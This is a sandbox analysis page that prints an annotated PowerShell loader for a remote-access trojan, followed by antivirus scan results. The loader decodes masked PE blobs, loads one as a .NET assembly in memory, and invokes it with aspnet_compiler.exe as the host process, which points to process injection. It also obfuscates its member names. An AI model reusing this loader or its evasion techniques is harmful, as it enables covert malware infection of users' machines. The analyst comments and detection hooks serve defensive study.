Static | ZeroBOX
No static analysis available.
#mY cODER 3LOSH RAT ::::::
# Analyst note: bit-string decoder. The argument is text made of '0' and '1'
# characters; every 8-character group is parsed as a base-2 byte and the bytes
# are returned as an ASCII string. In this listing it is called twice, to
# produce $SJEWS4 and $JDRU32, so the member names they hold never appear in
# clear text in the script.
# The identifiers read like escaped code points (U+206A, U+202C, U+202B,
# U+200B, U+202C, U+200F - invisible/bidi formatting characters); presumably
# the report rendered an originally invisible name as text - confirm against
# the raw sample.
# NOTE(review): the closing braces of the for loop and of the function are
# missing from this listing, so the block does not parse as shown.
Function HzGaJsAt([String] $u206Au202Cu202Bu200Bu202Cu200FX) {
# Growable byte buffer that collects the decoded output.
$u206Au202Cu202Bu200Bu202Cu200FXS = [System.Collections.Generic.List[Byte]]::new()
# Step through the input 8 characters (one byte) at a time.
for ($i = 0; $i -lt $u206Au202Cu202Bu200Bu202Cu200FX.Length; $i +=8) {
# Radix 2: the 8-character slice is read as binary digits.
$u206Au202Cu202Bu200Bu202Cu200FXS.Add([Convert]::ToByte($u206Au202Cu202Bu200Bu202Cu200FX.Substring($i, 8), 2))
return [System.Text.Encoding]::ASCII.GetString($u206Au202Cu202Bu200Bu202Cu200FXS.ToArray())
# Analyst note: hex decoder. Splits the input text into two-character pieces
# and emits each piece as an integer parsed in base 16; the callers cast the
# emitted values to [byte[]].
# As shown, it performs no character substitution. The blobs passed to it
# ($Ediiit, $geGWHZ) contain '%', '@' and '!', which are not hex digits, so a
# de-masking step must exist somewhere that this listing does not show.
# NOTE(review): the closing braces of the ForEach and of the function are
# missing from this listing.
function DEHZ {
param($Alosh)
# -split with a capture group returns the captured pairs plus empty strings
# between them; the `? { $_ }` filter drops the empties.
$Alosh = $Alosh -split '(..)' | ? { $_ }
ForEach ($JSEYHESSS325 in $Alosh){
# Not assigned to anything, so each value goes to the output stream and
# becomes part of the function's result.
[Convert]::ToInt32($JSEYHESSS325,16)
$Ediiit = '4D5@9%%%%3%%%%%%%4%%%%%%FFFF%%%%B8%%%%%%%%%%%%%%4%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%8%%%%%%%%E!FB@%E%%B4%9CD2!B8%!4CCD2!546869732%7%726F67726!6D2%636!6E6E6F742%62652%72756E2%696E2%444F532%6D6F64652E%D%D%@24%%%%%%%%%%%%%%5%45%%%%4C%!%3%%8@25%B65%%%%%%%%%%%%%%%%E%%%%2%!%B%!%8%%%%F8%%%%%%%@%%%%%%%%%%%%CE!6%!%%%%2%%%%%%%2%%!%%%%%%4%%%%%2%%%%%%%%2%%%%%4%%%%%%%%%%%%%%%4%%%%%%%%%%%%%%%%6%%!%%%%%2%%%%%%%%%%%%%2%%6%85%%%%!%%%%%!%%%%%%%%%!%%%%%!%%%%%%%%%%%%%!%%%%%%%%%%%%%%%%%%%%%%%78!6%!%%53%%%%%%%%2%%!%%FF%7%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%4%%!%%%C%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%2%%%%%%8%%%%%%%%%%%%%%%%%%%%%%%82%%%%%48%%%%%%%%%%%%%%%%%%%%%%2E74657874%%%%%%D4F6%%%%%%2%%%%%%%F8%%%%%%%2%%%%%%%%%%%%%%%%%%%%%%%%%%%%2%%%%%6%2E72737263%%%%%%FF%7%%%%%%2%%!%%%%%8%%%%%%F@%%%%%%%%%%%%%%%%%%%%%%%%%%%%4%%%%%4%2E72656C6F63%%%%%C%%%%%%%%4%%!%%%%%2%%%%%%%2%!%%%%%%%%%%%%%%%%%%%%%%%%%%4%%%%%42%%%%%%%%%%%%%%%%%%%%%
$geGWHZ = '4D5@9%%%%3%%%%%%%4%%%%%%FFFF%%%%B8%%%%%%%%%%%%%%4%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%8%%%%%%%%E!FB@%E%%B4%9CD2!B8%!4CCD2!546869732%7%726F67726!6D2%636!6E6E6F742%62652%72756E2%696E2%444F532%6D6F64652E%D%D%@24%%%%%%%%%%%%%%5%45%%%%4C%!%3%%3E7C36@7%%%%%%%%%%%%%%%%E%%%%E2!%B%!3%%%%%E8%%%%%%%6%%%%%%%%%%%%9E%7%!%%%%2%%%%%%%2%%!%%%%%%4%%%%%2%%%%%%%%2%%%%%4%%%%%%%%%%%%%%%6%%%%%%%%%%%%%%%%6%%!%%%%%2%%%%%%%%%%%%%3%%6%85%%%%!%%%%%!%%%%%%%%%!%%%%%!%%%%%%%%%%%%%%F%%%%%%%%%%%%%%%%%%%%%%5%%7%!%%4B%%%%%%%%2%%!%%64%3%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%4%%!%%%C%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%2%%%%%%8%%%%%%%%%%%%%%%%%%%%%%%82%%%%%48%%%%%%%%%%%%%%%%%%%%%%2E74657874%%%%%%@4E7%%%%%%2%%%%%%%E8%%%%%%%2%%%%%%%%%%%%%%%%%%%%%%%%%%%%2%%%%%6%2E72737263%%%%%%64%3%%%%%%2%%!%%%%%4%%%%%%E@%%%%%%%%%%%%%%%%%%%%%%%%%%%%4%%%%%4%2E72656C6F63%%%%%C%%%%%%%%4%%!%%%%%2%%%%%%EE%%%%%%%%%%%%%%%%%%%%%%%%%%%%4%%%%%42%%%%%%%%%%%%%%%%%%%%%
# Analyst note: both text blobs are converted to byte arrays here.
# Each blob starts with "4D5@9%", which reads as the PE "MZ" header
# (4D 5A 90 00) if '@', '%' and '!' stand in for 'A', '0' and '1'. Under the
# same mapping "546869732%7%726F67726!6D..." is the DOS-stub text "This
# program cannot be run in DOS mode", and 2E74657874 / 2E72737263 /
# 2E72656C6F63 are the section names .text / .rsrc / .reloc.
# NOTE(review): no visible line reverses that masking before DEHZ runs, and
# the literals on this page appear to stop after the section table. The report
# may have truncated or altered them - work from the raw sample when
# extracting the payloads for analysis.
# $UUSW23 ($Ediiit): passed later as the second argument of the invoked method.
[byte[]]$UUSW23 = DEHZ $Ediiit
# $JESTW3ERH2 ($geGWHZ): loaded later with [System.Reflection.Assembly]::Load.
[byte[]]$JESTW3ERH2 = DEHZ $geGWHZ
# Analyst note: three strings are hidden with the filler token "-X-X-X-XXX-".
# A static signature on that token, or on the literal fragments around it, is
# a cheap detection hook for this loader family.
# $SJEWS4: filler replaced by '0', then the bit string is decoded by HzGaJsAt.
# It decodes to "Execute" and is used as the method name given to GetMethod.
$SJEWS4 = (HzGaJsAt("-X-X-X-XXX-1-X-X-X-XXX--X-X-X-XXX--X-X-X-XXX-1-X-X-X-XXX-1-X-X-X-XXX-1111-X-X-X-XXX--X-X-X-XXX--X-X-X-XXX--X-X-X-XXX-11-X-X-X-XXX--X-X-X-XXX-1-X-X-X-XXX-1-X-X-X-XXX-11-X-X-X-XXX--X-X-X-XXX--X-X-X-XXX-11-X-X-X-XXX-111-X-X-X-XXX-1-X-X-X-XXX-1-X-X-X-XXX-111-X-X-X-XXX-1-X-X-X-XXX--X-X-X-XXX--X-X-X-XXX-11-X-X-X-XXX--X-X-X-XXX-1-X-X-X-XXX-1".Replace('-X-X-X-XXX-','0')))
# $JDRU32: filler replaced by '1', same decoder. It decodes to "Invoke" and is
# used as a member name on the resolved method object.
$JDRU32 = (HzGaJsAt("0-X-X-X-XXX-00-X-X-X-XXX-00-X-X-X-XXX-0-X-X-X-XXX--X-X-X-XXX-0-X-X-X-XXX--X-X-X-XXX--X-X-X-XXX-00-X-X-X-XXX--X-X-X-XXX--X-X-X-XXX-0-X-X-X-XXX--X-X-X-XXX-00-X-X-X-XXX--X-X-X-XXX-0-X-X-X-XXX--X-X-X-XXX--X-X-X-XXX--X-X-X-XXX-0-X-X-X-XXX--X-X-X-XXX-0-X-X-X-XXX-0-X-X-X-XXX--X-X-X-XXX-0-X-X-X-XXX--X-X-X-XXX-00-X-X-X-XXX-0-X-X-X-XXX-".Replace('-X-X-X-XXX-','1')))
# $JSEEESWR: the doubled filler is stripped later (the Replace that sets
# $HYYAW42), leaving
# C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
# - a signed Microsoft binary used here as the host-process path.
$JSEEESWR = 'C:\Wi-X-X-X-XXX--X-X-X-XXX-nd-X-X-X-XXX--X-X-X-XXX-ows\Mi-X-X-X-XXX--X-X-X-XXX-cro-X-X-X-XXX--X-X-X-XXX-soft.NET\Frame-X-X-X-XXX--X-X-X-XXX-work\v4.0.30319\asp-X-X-X-XXX--X-X-X-XXX-net_com-X-X-X-XXX--X-X-X-XXX-pi-X-X-X-XXX--X-X-X-XXX-ler.-X-X-X-XXX--X-X-X-XXX-e-X-X-X-XXX--X-X-X-XXX-x-X-X-X-XXX--X-X-X-XXX-e'
# Analyst note: staged execution of the decoded payloads.
# NOTE(review): the opening "try {" lines and several braces are missing or
# mangled in this listing; read it for statement order, not as parseable code.
# Each stage sits in a try with an empty catch, so failures are silent, and a
# one-second Sleep separates the stages.
# Detection hooks: PowerShell script block logging (event ID 4104) records the
# script text; on .NET Framework 4.8+ AMSI scans assemblies loaded from byte
# arrays; aspnet_compiler.exe started outside a build context (for example as
# a descendant of powershell.exe, or making network connections) is an
# anomaly worth alerting on.
Sleep 1
# Stage 1: load the second blob ($JESTW3ERH2) as a .NET assembly directly from
# the byte array. The type is reached through a variable rather than written
# inline next to ::Load.
$u206Au202Cu202Bu200Bu202Cu200F = [System.Reflection.Assembly]
$ncrx3 = $u206Au202Cu202Bu200Bu202Cu200F::Load(($JESTW3ERH2))
} catch { }
try
Sleep 1
# Stage 2: resolve the type 'NewPE2.PE' (name assembled from fragments) in the
# loaded assembly, then the method named by $SJEWS4 ("Execute").
$EUS3W3 = $ncrx3.GetType('N' +'e' +'wP' +'E2.PE');
$EUZW = $EUS3W3.'GetMethod'($SJEWS4);
} catch { }
try
Sleep 1
# Stage 3: strip the filler from the path, giving the aspnet_compiler.exe path.
$HYYAW42 = $JSEEESWR.Replace("-X-X-X-XXX--X-X-X-XXX-", "")
# Argument array: (host executable path, bytes of the first blob).
$SEYEYHHSSSSSSW = [object[]]($HYYAW42, $UUSW23)
Sleep 1
# $JDRU32 is "Invoke", so this reads the Invoke member of the method object
# and calls it with a $null target (static call) and the two arguments above.
# NOTE(review): a helper that takes a host path plus a PE byte array is
# consistent with running the payload inside aspnet_compiler.exe (process
# injection/hollowing); the helper's code is not on this page, so treat that
# as a hypothesis to confirm in the loaded assembly.
$EUZW.$JDRU32.Invoke($null, $SEYEYHHSSSSSSW)
} catch { }
} catch { }
Antivirus Signature
Bkav Clean
Lionic Clean
DrWeb Clean
ClamAV Clean
FireEye Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
VirIT Clean
Symantec Backdoor.ASync!gm
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Trj]
Cynet Clean
Kaspersky HEUR:Trojan.PowerShell.Kryptik.gen
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Clean
Rising Clean
Sophos Clean
F-Secure Clean
Baidu Clean
Zillya Clean
TrendMicro Clean
CMC Clean
Emsisoft Clean
Ikarus Trojan.MSIL.Agent
GData Clean
Jiangmin Clean
Google Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.PowerShell.Kryptik.gen
Microsoft Clean
Varist Clean
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
MAX Clean
VBA32 Clean
Zoner Clean
Tencent Clean
Yandex Clean
TACHYON Clean
MaxSecure Clean
Fortinet Clean
AVG Script:SNH-gen [Trj]
Panda Clean
No IRMA results available.